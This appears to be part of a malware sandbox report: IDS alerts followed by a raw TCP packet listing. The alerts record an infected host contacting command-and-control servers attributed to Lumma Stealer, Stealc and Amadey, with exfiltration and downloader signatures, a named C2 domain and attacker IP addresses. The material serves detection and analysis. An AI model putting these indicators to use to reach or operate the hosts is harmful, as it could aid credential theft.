2024-11-13T20:41:39.673704+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50166	172.67.174.133	443	TCP
2024-11-13T20:41:39.673704+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50166	172.67.174.133	443	TCP
2024-11-13T20:41:41.522123+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50167	172.67.174.133	443	TCP
2024-11-13T20:41:41.522123+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50167	172.67.174.133	443	TCP
2024-11-13T20:41:42.288481+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50169	172.67.174.133	443	TCP
2024-11-13T20:41:42.288481+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50169	172.67.174.133	443	TCP
2024-11-13T20:41:42.423356+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50168	185.215.113.43	80	TCP
2024-11-13T20:41:42.762124+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50169	172.67.174.133	443	TCP
2024-11-13T20:41:43.676345+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50170	185.215.113.16	80	TCP
2024-11-13T20:41:44.892918+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50172	172.67.174.133	443	TCP
2024-11-13T20:41:44.892918+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50172	172.67.174.133	443	TCP
2024-11-13T20:41:45.183995+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50171	185.215.113.206	80	TCP
2024-11-13T20:41:47.108028+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50174	172.67.174.133	443	TCP
2024-11-13T20:41:47.108028+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50174	172.67.174.133	443	TCP
2024-11-13T20:41:47.112290+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50174	172.67.174.133	443	TCP
2024-11-13T20:41:50.169982+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50180	172.67.174.133	443	TCP
2024-11-13T20:41:50.169982+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50180	172.67.174.133	443	TCP
2024-11-13T20:41:50.558147+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50180	172.67.174.133	443	TCP
2024-11-13T20:41:51.499261+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:51.499261+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:52.872166+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50182	185.215.113.16	80	TCP
2024-11-13T20:41:52.874549+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:52.874549+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:53.934986+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:41:53.934986+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:41:54.553598+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:41:54.553598+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:41:56.607446+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50193	172.67.174.133	443	TCP
2024-11-13T20:41:56.607446+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50193	172.67.174.133	443	TCP
2024-11-13T20:41:57.477359+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50193	172.67.174.133	443	TCP
2024-11-13T20:41:58.617359+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50198	172.67.174.133	443	TCP
2024-11-13T20:41:58.617359+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50198	172.67.174.133	443	TCP
2024-11-13T20:42:01.286280+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50202	172.67.174.133	443	TCP
2024-11-13T20:42:01.286280+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50202	172.67.174.133	443	TCP
2024-11-13T20:42:03.359336+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50204	172.67.174.133	443	TCP
2024-11-13T20:42:03.359336+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50204	172.67.174.133	443	TCP
2024-11-13T20:42:06.191339+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50212	172.67.174.133	443	TCP
2024-11-13T20:42:06.191339+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50212	172.67.174.133	443	TCP
2024-11-13T20:42:06.202088+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50212	172.67.174.133	443	TCP
2024-11-13T20:42:09.236029+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.5	50215	172.67.174.133	443	TCP
2024-11-13T20:42:09.236029+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50215	172.67.174.133	443	TCP
2024-11-13T20:42:09.907927+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50215	172.67.174.133	443	TCP
2024-11-13T20:42:10.573970+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50216	185.215.113.16	80	TCP
2024-11-13T20:42:13.971033+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	59836	1.1.1.1	53	UDP
2024-11-13T20:42:18.517150+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50222	185.215.113.206	80	TCP
2024-11-13T20:42:30.937708+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	55305	1.1.1.1	53	UDP
2024-11-13T20:42:50.091266+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	57470	1.1.1.1	53	UDP
2024-11-13T20:43:12.981987+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	50572	1.1.1.1	53	UDP
2024-11-13T20:43:43.617849+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	53800	1.1.1.1	53	UDP
2024-11-13T20:44:22.309561+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.5	55787	1.1.1.1	53	UDP
2024-11-13T20:44:28.066169+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50352	20.189.173.17	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 20:39:13.411957026 CET	49674	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:13.412679911 CET	49675	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:13.522135973 CET	49673	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:14.297660112 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.297683001 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.297699928 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.297717094 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.297736883 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.297816992 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.297817945 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.298109055 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298151970 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298176050 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.298213959 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298249006 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298285961 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.298321009 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298377037 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.298752069 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298787117 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298824072 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.298845053 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.349317074 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.421185017 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.421228886 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.421264887 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.421314955 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.421365023 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.421420097 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.470081091 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.470138073 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:14.475087881 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.475341082 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.475374937 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:14.475404024 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.058988094 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059036970 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059072971 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059107065 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059120893 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.059144974 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059164047 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.059242010 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059276104 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059299946 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.059309006 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059454918 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.059530020 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059577942 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059613943 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.059628010 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.085100889 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.085159063 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.090069056 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.090173960 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.090322971 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.090466976 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.115031958 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.430468082 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430567980 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430622101 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430655956 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430705070 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.430738926 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.430758953 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430794954 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430830956 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430852890 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.430883884 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430922031 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.430942059 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.431293964 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.431355953 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.431552887 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.446559906 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.446604967 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.451653957 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.451710939 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.451740026 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.451766968 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.451843977 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.458429098 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:15.458497047 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:15.458575964 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:15.458888054 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:15.458906889 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:15.474317074 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.923841953 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.923909903 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.923949957 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.923963070 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.923988104 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924024105 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924062014 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924072027 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.924114943 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.924274921 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924312115 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924349070 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924361944 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.924386978 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.924563885 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.924850941 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.925339937 CET	443	49710	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:15.925486088 CET	49710	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:15.947561026 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:15.947613955 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:15.947782040 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:15.948405981 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:15.948424101 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:16.584301949 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.584502935 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.598051071 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.598082066 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.598470926 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.600327015 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.600377083 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.600404024 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.976000071 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.976059914 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.976124048 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.976161957 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.976285934 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.976325989 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:16.976497889 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.976533890 CET	443	49715	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:16.976582050 CET	49715	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:17.000895023 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:17.000933886 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:17.001044035 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:17.001123905 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:17.001135111 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:17.084207058 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.084270000 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.087462902 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.087476015 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.087872028 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.089106083 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.089206934 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.089214087 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.089725018 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.131335020 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.362647057 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.363040924 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.363055944 CET	443	49716	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:17.363073111 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:17.363100052 CET	49716	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:18.155936003 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.187530041 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.187544107 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.188149929 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.188155890 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.188183069 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.188193083 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.611821890 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:18.611821890 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:18.616806030 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.616816998 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.616822004 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.616830111 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.617300987 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.688793898 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:18.693814039 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:18.693922043 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:18.694076061 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:18.699032068 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:18.786603928 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.786644936 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.786680937 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.786690950 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.786705971 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.786720037 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.786752939 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.798151970 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.798170090 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.798178911 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.798527956 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.798635960 CET	443	49718	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.798688889 CET	49718	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.923749924 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.923814058 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.923918009 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.924055099 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:18.924077034 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:18.978826046 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.978863955 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.978873968 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.978884935 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.978920937 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:18.978935957 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:18.979021072 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979031086 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979042053 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979101896 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:18.979474068 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979484081 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979495049 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979505062 CET	443	49714	20.190.159.64	192.168.2.5
Nov 13, 2024 20:39:18.979526043 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:18.979566097 CET	49714	443	192.168.2.5	20.190.159.64
Nov 13, 2024 20:39:19.010579109 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:19.010669947 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:19.010775089 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:19.011759043 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:19.011795044 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:19.613811016 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:19.613883972 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:19.616756916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:19.621563911 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:19.921221972 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:19.921294928 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:19.923130989 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:19.928016901 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.063474894 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.064043045 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.064068079 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.066016912 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.066026926 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.066063881 CET	49721	443	192.168.2.5	40.126.32.76
Nov 13, 2024 20:39:20.066075087 CET	443	49721	40.126.32.76	192.168.2.5
Nov 13, 2024 20:39:20.143903971 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.144006968 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.147317886 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.147326946 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.148159027 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.149622917 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.149928093 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.149935961 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.150103092 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.191339016 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.212542057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.212589025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.212619066 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.212644100 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.213721037 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:20.218540907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:20.398555040 CET	443	49722	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:20.400268078 CET	49722	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:20.400268078 CET	49722	443	192.168.2.5	40.115.3.253
